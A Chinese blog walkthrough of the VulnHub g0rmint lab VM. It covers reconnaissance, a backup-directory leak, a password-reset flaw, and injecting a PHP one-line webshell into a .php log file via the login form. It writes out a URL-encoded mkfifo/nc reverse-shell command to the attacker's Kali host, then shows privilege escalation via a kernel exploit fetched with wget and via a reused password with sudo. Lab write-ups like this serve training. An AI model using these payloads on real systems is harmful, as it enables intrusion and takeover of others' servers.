kali渗透综合靶机(十四)--g0rmint靶机

最新推荐文章于 2023-09-23 09:47:24 发布
最新推荐文章于 2023-09-23 09:47:24 发布
阅读量631 收藏 5
点赞数
分类专栏: # kali综合渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/105182806
版权

一、靶机下载

下载链接:https://www.vulnhub.com/entry/g0rmint-1,214/

二、g0rmint靶机搭建

将下载好的靶机环境,用VMware导入即可使用,文件->打开
在这里插入图片描述
在这里插入图片描述
导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可
在这里插入图片描述
在这里插入图片描述

三、攻击过程

kali IP:192.168.212.6
靶机IP:192.168.212.10

1、主机发现

在这里插入图片描述

2、端口扫描

方法一:
在这里插入图片描述
方法二:
在这里插入图片描述

3、端口服务识别

在这里插入图片描述

4、漏洞查找与利用

访问网站
在这里插入图片描述
扫描目录
在这里插入图片描述
发现
在这里插入图片描述
访问
在这里插入图片描述
查看页面源码,发现备份目录
在这里插入图片描述
在这里插入图片描述
使用dirb 扫描http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/,发现http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/info.php
在这里插入图片描述
访问http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/info.php
在这里插入图片描述
下载备份文件
在这里插入图片描述
查看网站代码,发现用户名、密码、邮箱,尝试登录失败
在这里插入图片描述
在这里插入图片描述
查看login.php,发现登录失败的时候会生成一个日志文件(调用addlog函数)
在这里插入图片描述
查看addlog函数,发现日志写在.php文件中,尝试在登录邮箱处插入php语句,从而任意执行代码
在这里插入图片描述
在登录邮箱处插入php一句话木马,点击提交,登录失败跳转到登录页面
最后发现是fwrite($fh, file_get_contents(“dummy.php”) . “
\n”);写入了一个session判断
在这里插入图片描述
所以需要先解决登录的问题。
查看reset.php,可以看到只要知道了一个存在的邮箱和用户名,就可以重置密码为一个时间值的哈希,尝试了demo和一些常用邮箱用户名之后,发现似乎并没有这个用户
在这里插入图片描述
在全文搜索email关键字, 可以在一个css文件中看到用户的名字和邮箱
在这里插入图片描述
成功重置后,界面右下角也给出了对应的时间,遂能算出相应的哈希值,使用在线的hash加密,去加密成功后的hash值前20位最为密码的值
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
重置密码
在这里插入图片描述
访问到生成的log文件,因在代码审计中发现登录失败日志路径
在这里插入图片描述
访问http://192.168.212.10/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-03-29.php
(由于时间戳原因,日期需提前一天)
在这里插入图片描述
在登陆的时候邮箱处插入一句话木马,然后访问对应日志,提交POST参数即可执行任意PHP代码。
在这里插入图片描述
在这里插入图片描述
然后将shell反弹到我的kali中来
在post中输入:注意需要url编码
cmd=%60rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%20192.168.212.6%201234%20%3E%2Ftmp%2Ff%3B%60%3B
在这里插入图片描述
kali监听
在这里插入图片描述

提权方式一

查看内核版本
在这里插入图片描述
kali查看是否有对应版本的漏洞
在这里插入图片描述
在kali编译好脚本,然后目标用wget下载,执行,获得管理员权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权方式二

在1的基础上
在/var/www目录下又发现网站备份文件,解压发现db.sql
在这里插入图片描述
在这里插入图片描述
查看db.sql发现用户noman以及密码
在这里插入图片描述
在这里插入图片描述
密码解压
在这里插入图片描述
用户名/密码:noman/tayyab123
尝试用noman用户登录,失败,发现/etc/passwd中有g0rmint,尝试用noman的密码登录,成功登录进去
在这里插入图片描述
用sudo -l 查看当前用户是否属于sudo组,然后sudo -i 直接获得管理员权限
在这里插入图片描述

总结

1、信息收集、端口扫描、服务识别
2、目录扫描、发现敏感信息备份文件
3、登录密码的地方暂时突破不了,尝试在重置密码的地方寻找突破口、发现有用信息
4、进行代码审计,发现日志文件的后缀是php文件,这时可以尝试在登录的地方接入一句话,然后就写入到日志中。
5、getshell、提权

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

W小哥1
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1183
下载Linux应用程序虚拟机、Windows下载、metasploit下载
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar https://download.csdn.net/download/weixin_43800734/25872729 kali-linux-2021.3-installer-amd64.part4.rar https://download.csdn.net/download/weixin_43800734/25872820 kali-linux-2021.3-installer-amd64.part3.rar https://download.csdn.net/download/weixin_43800734/25872795 kali-linux-2021.3-installer-amd64.part2.rar https://download.csdn.net/download/weixin_43800734/25872637 kali-linux-2021.3-installer-amd64.part1.rar https://download.csdn.net/download/weixin_43800734/25872106 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebook
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:https://download.csdn.net/download/weixin_43800734/88423342 文件3:https://download.csdn.net/download/weixin_43800734/88423341 文件4:https://download.csdn.net/download/weixin_43800734/88423331
[渗透测试]Vulnstack 红队(一)
cosmoslin的博客
02-08 2147
官方描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019 域环境初始化 攻击机: kali ip:192.168.111.5 靶机: win7 外网ip:192.168.111.6 内网ip:192.168.52.14
【vulnhub】---g0rmint靶机
qq_43168364的博客
08-22 306
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机g0rmint靶机(192.168.15.156) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 命令:masscan --rate=10000 --po
靶机实战-g0rmint
滕财然的博客
01-30 603
g0rmint靶机实战 文章目录g0rmint靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、getshell反弹shell方法一反弹shell方法二6、提权方法一方法二 1、主机发现 目标IP:192.168.232.165 2、端口扫描 开放80、22端口 3、端口详细信息扫描 4、访问80端口–http服务 dirb扫一下其它目录 依次访问:...
靶机渗透(十)g0rmint
qq_42180996的博客
05-22 1434
靶机g0rmint 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.访问/robots.txt 4.代码审计 5.重置密码 6....
靶机记录(五):g0rmint
weixin_47306547的博客
10-29 149
目录 主机发现 端口扫描 FTP Web渗透 目录扫描 漏洞挖掘 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 FTP Web渗透 目录扫描 漏洞挖掘 代码分析 从重置密码入手 看之前写入的一句话木马(登录状态下) GetShell 依次执行: HACK=`mkfifo /tmp/t`; HACK=%60mkfifo%20%2ftmp%2ft%60%3B HACK=`cat...
渗透测试靶场练习(二)之g0rmint
习惯积淀的博客
04-09 877
渗透测试g0rmint 信息搜集 arp-scan扫描 查找到IP为192.168.24.131的主机为靶机 主机探测 发现有22端口和web的80端口,扫描网站目录获得robots.txt 打开robots.txt发现/g0rmint/路径,打开是一个登陆界面,在源码中发现备份文件 打开发现文件不存在,应该是在这个目录下,使用dirb扫描发现info.php,打开提示有backup....
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
Kali网络渗透英文词汇-圣经版
11-01
Kali网络渗透英文词汇-圣经版
[渗透测试]Vulnstack 红队(二)
cosmoslin的博客
02-10 2197
环境初始化 DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域 WEB IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogic 10.3.6 MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用: 攻击机 IP:192.168.111.5 OS:Kali weblogic漏洞利用 nm
[渗透测试]Vulnstack 红队(三)
cosmoslin的博客
03-10 3906
环境配置 网络拓扑图(仅供参考) 攻击机: kali ip:192.168.111.5 靶机: web-centos 外网ip:192.168.111.10 内网ip:192.168.93.100 web1-ubuntu ip: 192.168.93.120 PC ip: 192.168.93.30 win 2008 ip:192.168.93.20 win 2012 ip:192.168.93.10 渗透测试 信息搜集 端口扫描: nmap -sS 192.168.111.10 发现
【网络安全】红队渗透项目之Stapler1(下)
A_991128a的博客
01-06 207
声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。
记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)
热门推荐
5年编程经验的老猿。
09-23 1万+
很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux? 实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。 Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。...
靶机实战(g0rmint)
weixin_45605313的博客
07-04 251
g0rmint实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用反弹shell提权总结 实验环境 靶机g0rmint 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 查看web主页,没有主页 目录
kali渗透综合靶机(一)--Lazysysadmin靶机
W小哥
03-05 4915
一、靶机下载 Lazysysadmin靶机百度云下载 链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ 提取码:q6zo 二、靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 1、主机发现 因靶机是自动获取IP,与kali在同一个网段,故...
kali linux渗透测试靶机
最新发布
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值